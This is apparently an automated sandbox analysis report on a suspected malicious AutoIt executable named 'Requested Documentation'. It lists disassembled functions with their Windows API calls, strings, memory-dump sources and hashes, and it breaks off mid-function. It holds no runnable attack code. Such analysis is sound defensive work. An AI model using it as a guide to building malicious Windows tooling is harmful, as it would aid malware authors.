                                                                              Function 00A0BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A0BA56
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A0BA6D
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A0BA78
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A0BA85
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A0BA8E
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A0BA9D
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A0BAA6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A0BAAD
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A0BABE
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A12CAC,?), ref: 00A0BAD7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A0BAE7
                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00A0BB0B
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00A0BB36
                                                                              • DeleteObject.GDI32(00000000), ref: 00A0BB5E
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A0BB74
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
                                                                              • Instruction ID: 486174ac88d668c8f665f451edc792f82e422767d19f635c0edfcfc6a76dd081
                                                                              • Opcode Fuzzy Hash: 53630e286c3bf0927da0c847299ad67c010b520fd8eef5286fe6c95f1f6fec98
                                                                              • Instruction Fuzzy Hash: 0E411975600208EFDB21DFA5ED88EAA7BB8FB89711F104168F905E72A0D7719D42CB60
                                                                              Function 009ED899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 009EDA10
                                                                              • _wcscat.LIBCMT ref: 009EDA28
                                                                              • _wcscat.LIBCMT ref: 009EDA3A
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDA4F
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDA63
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009EDA7B
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 009EDA95
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDAA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
                                                                              • Instruction ID: c0327a65977261cc199fd8dab95a71aee26a75eb9a6a828ff0d1d1c756f55342
                                                                              • Opcode Fuzzy Hash: 343dd7376b91ea75f271cdc49efc504c6a71ec68b0e8285ebcc3e00eaf6987a6
                                                                              • Instruction Fuzzy Hash: 7B81C5715063819FCB25EF66C840A6AB7E8BF89314F184C2EF889CB252E734DD45CB52
                                                                              Function 00A0C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A0C1FC
                                                                              • GetFocus.USER32 ref: 00A0C20C
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00A0C217
                                                                              • _memset.LIBCMT ref: 00A0C342
                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A0C36D
                                                                              • GetMenuItemCount.USER32(?), ref: 00A0C38D
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A0C3A0
                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A0C3D4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A0C41C
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A0C454
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A0C489
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: dbeb891333bdeb09efa2b63569b541420d09804effc8cb54b9fe5ff0852edf3b
                                                                              • Instruction ID: 8bfc67c197d9f61f3d1340b824841ffc7c13687f4ff076748a9a8eab264621f8
                                                                              • Opcode Fuzzy Hash: dbeb891333bdeb09efa2b63569b541420d09804effc8cb54b9fe5ff0852edf3b
                                                                              • Instruction Fuzzy Hash: 408181706083099FD720DF64E894ABBBBE4FB88724F004A2DF995972D1D731D905CB92
                                                                              Function 009F731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 009F738F
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009F739B
                                                                              • CreateCompatibleDC.GDI32(?), ref: 009F73A7
                                                                              • SelectObject.GDI32(00000000,?), ref: 009F73B4
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009F7408
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009F7444
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009F7468
                                                                              • SelectObject.GDI32(00000006,?), ref: 009F7470
                                                                              • DeleteObject.GDI32(?), ref: 009F7479
                                                                              • DeleteDC.GDI32(00000006), ref: 009F7480
                                                                              • ReleaseDC.USER32(00000000,?), ref: 009F748B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 975ffdef6b1e60d9c4f0b351f5e19c48c640f2810a240779c3fa3a6896d6acbe
                                                                              • Instruction ID: 42951b727f9abf8c8bb4f6c56636c436e6a3f43d5402e364d0a13080a18d0176
                                                                              • Opcode Fuzzy Hash: 975ffdef6b1e60d9c4f0b351f5e19c48c640f2810a240779c3fa3a6896d6acbe
                                                                              • Instruction Fuzzy Hash: 01515A75904309EFCB24CFA8DC84EAEBBB9EF48310F14842DFA59A7211D771A941CB50
                                                                              Function 00986A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00986B0C,?,00008000), ref: 009A0973
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00986CFA
                                                                                • Part of subcall function 0098586D: _wcscpy.LIBCMT ref: 009858A5
                                                                                • Part of subcall function 009A363D: _iswctype.LIBCMT ref: 009A3645
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 537147316-1018226102
                                                                              • Opcode ID: c319f1743a2aa45444eab6d69c55ae53cf9eaca30a7f639460587668406659c1
                                                                              • Instruction ID: 83a77b2a6ee2501d33805fe028fc77aecaf7e48fc6e0f2adbcf56710fd796709
                                                                              • Opcode Fuzzy Hash: c319f1743a2aa45444eab6d69c55ae53cf9eaca30a7f639460587668406659c1
                                                                              • Instruction Fuzzy Hash: 1D0289311083419FCB24EF24C991AAFBBE9AFD9314F14481DF49A973A2DB31D949CB52
                                                                              Function 009E2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2D50
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009E2DDD
                                                                              • GetMenuItemCount.USER32(00A45890), ref: 009E2E66
                                                                              • DeleteMenu.USER32(00A45890,00000005,00000000,000000F5,?,?), ref: 009E2EF6
                                                                              • DeleteMenu.USER32(00A45890,00000004,00000000), ref: 009E2EFE
                                                                              • DeleteMenu.USER32(00A45890,00000006,00000000), ref: 009E2F06
                                                                              • DeleteMenu.USER32(00A45890,00000003,00000000), ref: 009E2F0E
                                                                              • GetMenuItemCount.USER32(00A45890), ref: 009E2F16
                                                                              • SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E2F4C
                                                                              • GetCursorPos.USER32(?), ref: 009E2F56
                                                                              • SetForegroundWindow.USER32(00000000), ref: 009E2F5F
                                                                              • TrackPopupMenuEx.USER32(00A45890,00000000,?,00000000,00000000,00000000), ref: 009E2F72
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009E2F7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: 55d4af00c7c8661fefc4dd657b5b19eda295d02bd4488ba4273567bbcfa1ccda
                                                                              • Instruction ID: 7deb9dbd2fbab1fe1eae868896f097c5a39692153c5fe389e764d016de0785f7
                                                                              • Opcode Fuzzy Hash: 55d4af00c7c8661fefc4dd657b5b19eda295d02bd4488ba4273567bbcfa1ccda
                                                                              • Instruction Fuzzy Hash: D271F571600299BFEB268F56DC45FAABF6CFF44364F10021AF625AA1E1C7B16C50DB90
                                                                              Function 009D77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • _memset.LIBCMT ref: 009D786B
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009D78A0
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009D78BC
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009D78D8
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009D7902
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009D792A
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D7935
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D793A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1411258926-22481851
                                                                              • Opcode ID: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
                                                                              • Instruction ID: 103bba1cd192d88c5383eb42b671558e6ebda4bd96473d5cfe16870d7ab6a083
                                                                              • Opcode Fuzzy Hash: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
                                                                              • Instruction Fuzzy Hash: C241D67281422DABCB21EFE4DC95EEDF778BF54310F44446AF905A3261EA319D05CB90
                                                                              Function 00A00E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
                                                                              • Instruction ID: 3541bed1d63e11aac9c274eb724bbcf80e1f761f0fcf4b70f5a34855e9997dc2
                                                                              • Opcode Fuzzy Hash: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
                                                                              • Instruction Fuzzy Hash: 83416A3110025A8BCF20EF50E895BEF3B60AF92354F580424FC555B2D2DB719D1ADBA0
                                                                              Function 009DF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009BE2A0,00000010,?,Bad directive syntax error,00A0F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009DF7C2
                                                                              • LoadStringW.USER32(00000000,?,009BE2A0,00000010), ref: 009DF7C9
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • _wprintf.LIBCMT ref: 009DF7FC
                                                                              • __swprintf.LIBCMT ref: 009DF81E
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009DF88D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1506413516-4153970271
                                                                              • Opcode ID: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
                                                                              • Instruction ID: b82163bd8bbe96f860cdd332f566204e612cf2476132c10d02a445936c98d08a
                                                                              • Opcode Fuzzy Hash: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
                                                                              • Instruction Fuzzy Hash: 9B215C3294021EBBCF11EFD0CC1AFEEB739BF18300F044866F516662A1EA769618DB51
                                                                              Function 009E52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                                • Part of subcall function 00987924: _memmove.LIBCMT ref: 009879AD
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009E5330
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009E5346
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009E5357
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009E5369
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009E537A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_memmove
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 2279737902-1007645807
                                                                              • Opcode ID: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
                                                                              • Instruction ID: 59745aa0c7c58dc7c16995a7bfec0258378fe186532149f680f27d0390d59a92
                                                                              • Opcode Fuzzy Hash: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
                                                                              • Instruction Fuzzy Hash: C011C83095025979D720B7A2CC4AEFFBB7CFBD1B44F100819F411A31E1EEA04D05C6A0
                                                                              Function 009E46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 208665112-3771769585
                                                                              • Opcode ID: c12905a0ff50a1211b3c89b00844fb890f5f1f3ffc4a6dd35b173b97cabb6825
                                                                              • Instruction ID: 2c19a71637110bd3f6e9a4134bf555801bcac55e0e6e1d252a217fac09bd73f2
                                                                              • Opcode Fuzzy Hash: c12905a0ff50a1211b3c89b00844fb890f5f1f3ffc4a6dd35b173b97cabb6825
                                                                              • Instruction Fuzzy Hash: FD11E731500118AFCF21AB759C4AFDA77BCEF86711F0441B6F445A6091FF768E8286D1
                                                                              Function 009E4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 009E4F7A
                                                                                • Part of subcall function 009A049F: timeGetTime.WINMM(?,75C0B400,00990E7B), ref: 009A04A3
                                                                              • Sleep.KERNEL32(0000000A), ref: 009E4FA6
                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 009E4FCA
                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009E4FEC
                                                                              • SetActiveWindow.USER32 ref: 009E500B
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009E5019
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 009E5038
                                                                              • Sleep.KERNEL32(000000FA), ref: 009E5043
                                                                              • IsWindow.USER32 ref: 009E504F
                                                                              • EndDialog.USER32(00000000), ref: 009E5060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
                                                                              • Instruction ID: c7bdc30d1cb0c92cd3e7b2381a84f11402b814551962d845fe6c5369a6c6ac3a
                                                                              • Opcode Fuzzy Hash: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
                                                                              • Instruction Fuzzy Hash: C721C278600748AFE722DFF1EC89B663B69EB8674AF041424F106925B1CBA24D038663
                                                                              Function 009ED58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CoInitialize.OLE32(00000000), ref: 009ED5EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009ED67D
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 009ED691
                                                                              • CoCreateInstance.OLE32(00A12D7C,00000000,00000001,00A38C1C,?), ref: 009ED6DD
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009ED74C
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 009ED7A4
                                                                              • _memset.LIBCMT ref: 009ED7E1
